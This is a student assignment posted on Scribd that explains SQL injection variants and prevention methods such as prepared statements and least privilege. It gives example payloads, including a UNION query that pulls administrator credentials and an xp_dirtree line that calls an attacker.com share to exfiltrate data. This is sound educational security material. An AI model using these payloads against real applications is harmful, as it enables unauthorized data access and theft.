Scribd
Upload
8 views4 pages

Applied Exploit and Hacking 5

The document provides an overview of SQL Injection (SQLi), a security vulnerability in web applications where attackers manipulate database queries through malicious SQL code. It details various types of SQLi, including Classic, Blind, and Out-of-Band SQL Injection, along with methods of prevention such as parameterized queries, input validation, and the use of web application firewalls. The document emphasizes the importance of securing applications against these attacks to protect sensitive data and maintain system integrity.

Uploaded by

syedbadshah0550
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
8 views4 pages

Applied Exploit and Hacking 5

The document provides an overview of SQL Injection (SQLi), a security vulnerability in web applications where attackers manipulate database queries through malicious SQL code. It details various types of SQLi, including Classic, Blind, and Out-of-Band SQL Injection, along with methods of prevention such as parameterized queries, input validation, and the use of web application firewalls. The document emphasizes the importance of securing applications against these attacks to protect sensitive data and maintain system integrity.

Uploaded by

syedbadshah0550
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Lahore Garrison University

Name:
Aftab Hussain
Roll no:
Fa-21/Bs DFCS/033
Submitted by:
Aftab Hussain
Submitted to:
Saud Bin Farooq
Assignment:
Applied Exploits and Hacking

Assignment: 02
What is SQL Injection (SQLi)?
SQL Injection is a security flaw in web applications where attackers
manipulate database queries by injecting malicious SQL code through user
input. This typically occurs when input isn’t properly validated or sanitized
before being used in a query. Successful SQL injection attacks can enable an
attacker to:

 Access sensitive information

 Alter or delete data in the database

 Perform administrative tasks

 Bypass authentication mechanisms

 In extreme cases, take full control of the underlying system (if remote
code execution is possible)

Types of SQL Injection

1. Classic (In-Band) SQL Injection


Description:
This is the most common form of SQLi. The attacker uses the same
communication path to deliver the attack and retrieve the results.

Variants:

 Error-Based SQLi
Method: Exploits error messages returned by the database to extract
information.
Example Payload: ' OR 1=1 --
Injected into:
SELECT * FROM users WHERE username = '$input';
Effect: Returns all users by manipulating the condition to always be
true, or reveals database errors.

 Union-Based SQLi
Method: Uses the UNION SQL operator to merge results from different
queries into a single response.
Example Payload: ' UNION SELECT username, password FROM
admin_table --
Injected into:
SELECT name, email FROM customers WHERE id = '$id';
Effect: Discloses data from other tables, such as administrator
credentials.

2. Blind SQL Injection


Description:
Occurs when the application doesn’t display error messages, but attackers
can infer the result of queries based on changes in application behavior.

Variants:

 Boolean-Based (Content-Based) Blind SQLi


Method: Injects conditions that evaluate as true or false and observes
how the application responds.
Examples:
' AND 1=1 -- (True)
' AND 1=2 -- (False)
Effect: Different page responses help deduce if injected statements are
true or false.

 Time-Based Blind SQLi


Method: Uses database time-delay functions to determine if a condition
is true.
Example:
' IF (SUBSTRING((SELECT database()),1,1) = 'a') WAITFOR DELAY
'00:00:05' --
Effect: If the server delays the response, the condition was true,
allowing attackers to extract data over time.

3. Out-of-Band SQL Injection


Description:
Used when traditional methods fail. It extracts data through alternate
channels such as DNS or HTTP requests.
Example:
'; EXEC xp_dirtree '\\attacker.com\share' --
Effect: Forces the database server to make a request to a server controlled
by the attacker, allowing data exfiltration.

How to Prevent SQL Injection


1. Parameterized Queries (Prepared Statements):
Use query placeholders instead of directly embedding user input. This
treats input as data, not executable code.
Example (PHP with PDO):

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");

$stmt->execute([$username]);

2. Stored Procedures:
Encapsulate SQL logic in predefined routines on the database. Properly
implemented, they limit SQLi exposure.

3. Input Validation and Whitelisting:


Always validate input. Accept only known, expected values (e.g., numeric
IDs) and reject or sanitize anything else.

4. Use ORM Frameworks:


Frameworks like Hibernate (Java), SQLAlchemy (Python), and Entity
Framework (.NET) abstract SQL away, reducing direct exposure to
injection risks.

5. Principle of Least Privilege:


Application database users should only have permissions they need—
avoid using root/admin accounts for web applications.

6. Web Application Firewalls (WAFs):


Deploy a WAF to inspect and block malicious traffic, including known SQLi
attack patterns.

7. Error Message Handling:


Avoid showing detailed database errors to end users. Use generic
messages while logging technical details internally.

8. Regular Security Testing:


Perform frequent penetration testing and code audits. Use tools like:

o sqlmap: For automated SQL injection detection

o Burp Suite: For both manual and automated vulnerability testing

You might also like